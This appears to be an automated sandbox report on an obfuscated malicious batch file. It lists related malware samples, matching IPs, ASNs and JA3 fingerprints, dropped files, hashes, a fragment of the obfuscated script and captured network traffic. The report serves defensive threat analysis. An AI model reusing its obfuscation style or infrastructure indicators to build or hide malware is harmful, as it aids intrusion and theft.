                                                                                                                                                                                                                          1_Garmin_Campaign Information for Partners(12-10).docx.lnk.download.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          nbavdfasfGarminde.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          edge-block-www-env.dropbox-dns.comQhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          hngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.65.15

                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          CLOUDFLARENETUSRECOUVREMENT -FACTURER1184521.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                          • 1.8.182.26
                                                                                                                                                                                                                          StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                          • 104.21.78.102
                                                                                                                                                                                                                          https://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 104.18.11.207
                                                                                                                                                                                                                          fAatfRnCZ5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.21.198
                                                                                                                                                                                                                          1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                          • 104.21.78.102
                                                                                                                                                                                                                          http://efaktura.dhlecommerce.plGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.18.86.42
                                                                                                                                                                                                                          DROPBOXUSQhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.4.18
                                                                                                                                                                                                                          xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.21.1
                                                                                                                                                                                                                          hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.65.18
                                                                                                                                                                                                                          kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                          • 162.125.113.170
                                                                                                                                                                                                                          sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.18

                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eQhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          g1.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          raEyjKggAf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78

                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                                                          Entropy (8bit):0.6599547231656377
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Nlllulmll:NllU
                                                                                                                                                                                                                          MD5:8238A428604DFCBB76A63390CD65BBDE
                                                                                                                                                                                                                          SHA1:A4DA8D52DFE36DEB522DCAE7654E94B2F8391A57
                                                                                                                                                                                                                          SHA-256:E8E3F8A61FAA25DC1F29646A3E573345812BC15720CFC195094D9AD37C82A012
                                                                                                                                                                                                                          SHA-512:061B3CCBA39A1E40BDF95D1D612B220B9C3C395DCC3249E9D03AF0B5ED92AAF770127849CBE0C5E41BEA342C54368E2294EA775DC37F5239DFAF4DBB557E79AE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:@...e...........................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3lmz0kyh.r0n.ps1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nj4jdie.pil.ps1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3qhjxbm0.eca.psm1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4m3lpdgj.pgh.ps1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baoyfxcz.5oa.ps1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5zogloe.0ca.psm1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rs4gk2ui.nbu.psm1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uaplejdi.vr4.ps1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnjsttad.wcn.psm1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfiglhvh.wbn.psm1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                          C:\Users\user\Desktop\tmp

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):14
                                                                                                                                                                                                                          Entropy (8bit):3.521640636343319
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Mrv:gv
                                                                                                                                                                                                                          MD5:CE585C6BA32AC17652D2345118536F9C
                                                                                                                                                                                                                          SHA1:BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
                                                                                                                                                                                                                          SHA-256:589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
                                                                                                                                                                                                                          SHA-512:D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:ECHO is off...

                                                                                                                                                                                                                          \Device\Null

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\find.exe
                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):36
                                                                                                                                                                                                                          Entropy (8bit):3.8956388075276664
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:gOmAe9qQn:xm/
                                                                                                                                                                                                                          MD5:89D484A82D15549C8F4BF2B4D4F1E924
                                                                                                                                                                                                                          SHA1:58F49E997A58A17C2902E08026BAC2DD16A34B1B
                                                                                                                                                                                                                          SHA-256:040AE1183CD6102AC612B2D88C2816B358FDC4743BC9CD05376E797595167B40
                                                                                                                                                                                                                          SHA-512:C0C920A9369FF9E28C9DAE6CA21AE7A1F9A79F2F4F8F97E247D133700FC446CEAA2C6C40116DE644CEA9336D9064792F3AD7011EBCBF5B6675779C57590F167B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:FIND: Parameter format not correct..

                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          File type:Non-ISO extended-ASCII text, with very long lines (1572), with LF, NEL line terminators, with escape sequences
                                                                                                                                                                                                                          Entropy (8bit):5.7595402735645145
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                          • MP3 audio (1001/1) 100.00%
                                                                                                                                                                                                                          File name:hngadsfkgj17.bat
                                                                                                                                                                                                                          File size:34'400 bytes
                                                                                                                                                                                                                          MD5:6c35c77c00bba44f2d86d74cd3e6a3de
                                                                                                                                                                                                                          SHA1:82e5786895b0ddc0418699d2d980c818406d8063
                                                                                                                                                                                                                          SHA256:61e9db26c03e7850f014dff5430495ada8406aea46fc4fbe237b68d3abc8e59d
                                                                                                                                                                                                                          SHA512:3e97a481b310571687dc02d0a5e928a687b8ca0d4fea357997462b97c148e4bf38c8ac4523e0f7edb15965276f69976ab2a7703405edb1ac076e19a5d41c2542
                                                                                                                                                                                                                          SSDEEP:384:ojpf16DrfdlD9BAt+qw+5B8XUcltcPSI1MzITrHLS57GlnTAtnB61:upfcDrf/D9Gt+L+5B8XRltcPSqYj6
                                                                                                                                                                                                                          TLSH:E4F29F1A7693BD4DE46EC375D28110B6A1CE783EB97F5863403E31BEBBB011A5B458B0
                                                                                                                                                                                                                          File Content Preview:....>nul 2>&1 &cls.;@;@e^c%...............^...%%............^......%%...............^...%ho of%...^..............%%......^............%^f&f^%...( ..._...)......(......_...)......(......_...)...(.........)...( ..._...)......^(......_...)...%%...( ..._...).

                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                          Icon Hash:9686878b929a9886

                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Dec 19, 2024 14:13:23.633236885 CET49721443192.168.2.6162.125.69.18
                                                                                                                                                                                                                          Dec 19, 2024 14:13:23.633301973 CET44349721162.125.69.18192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:23.633424044 CET49721443192.168.2.6162.125.69.18
                                                                                                                                                                                                                          Dec 19, 2024 14:13:23.641711950 CET49721443192.168.2.6162.125.69.18
                                                                                                                                                                                                                          Dec 19, 2024 14:13:23.641743898 CET44349721162.125.69.18192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:25.072324991 CET44349721162.125.69.18192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:25.072436094 CET49721443192.168.2.6162.125.69.18
                                                                                                                                                                                                                          Dec 19, 2024 14:13:25.074343920 CET49721443192.168.2.6162.125.69.18
                                                                                                                                                                                                                          Dec 19, 2024 14:13:25.074352980 CET44349721162.125.69.18192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:25.074661016 CET44349721162.125.69.18192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:25.082024097 CET49721443192.168.2.6162.125.69.18
                                                                                                                                                                                                                          Dec 19, 2024 14:13:25.123328924 CET44349721162.125.69.18192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:26.109827042 CET44349721162.125.69.18192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:26.109997034 CET44349721162.125.69.18192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:26.110028028 CET49721443192.168.2.6162.125.69.18
                                                                                                                                                                                                                          Dec 19, 2024 14:13:26.110702038 CET49721443192.168.2.6162.125.69.18
                                                                                                                                                                                                                          Dec 19, 2024 14:13:26.122500896 CET49721443192.168.2.6162.125.69.18
                                                                                                                                                                                                                          Dec 19, 2024 14:13:30.813496113 CET49738443192.168.2.6172.65.251.78
                                                                                                                                                                                                                          Dec 19, 2024 14:13:30.813543081 CET44349738172.65.251.78192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:30.813786030 CET49738443192.168.2.6172.65.251.78
                                                                                                                                                                                                                          Dec 19, 2024 14:13:30.816509962 CET49738443192.168.2.6172.65.251.78
                                                                                                                                                                                                                          Dec 19, 2024 14:13:30.816533089 CET44349738172.65.251.78192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.036772013 CET44349738172.65.251.78192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.036982059 CET49738443192.168.2.6172.65.251.78
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.038870096 CET49738443192.168.2.6172.65.251.78
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.038887024 CET44349738172.65.251.78192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.039158106 CET44349738172.65.251.78192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.048746109 CET49738443192.168.2.6172.65.251.78
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.091339111 CET44349738172.65.251.78192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.628323078 CET44349738172.65.251.78192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.628387928 CET44349738172.65.251.78192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.628477097 CET49738443192.168.2.6172.65.251.78
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.628495932 CET44349738172.65.251.78192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.628520966 CET44349738172.65.251.78192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.628572941 CET49738443192.168.2.6172.65.251.78
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.634855986 CET49738443192.168.2.6172.65.251.78
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.635683060 CET49744443192.168.2.6172.65.251.78
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.635736942 CET44349744172.65.251.78192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.635981083 CET49744443192.168.2.6172.65.251.78
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.636147022 CET49744443192.168.2.6172.65.251.78
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.636162996 CET44349744172.65.251.78192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.713619947 CET49744443192.168.2.6172.65.251.78
                                                                                                                                                                                                                          Dec 19, 2024 14:13:32.755331039 CET44349744172.65.251.78192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:33.848299026 CET44349744172.65.251.78192.168.2.6
